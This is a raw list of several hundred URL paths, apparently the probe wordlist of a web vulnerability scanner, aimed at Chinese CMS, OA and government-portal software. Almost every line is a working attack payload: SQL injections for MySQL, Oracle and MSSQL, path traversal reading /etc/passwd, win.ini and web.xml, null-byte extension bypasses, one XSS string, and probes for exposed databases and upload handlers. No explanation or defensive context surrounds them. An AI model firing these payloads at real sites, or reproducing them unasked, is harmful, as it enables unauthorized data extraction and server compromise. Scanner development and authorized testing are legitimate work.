/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
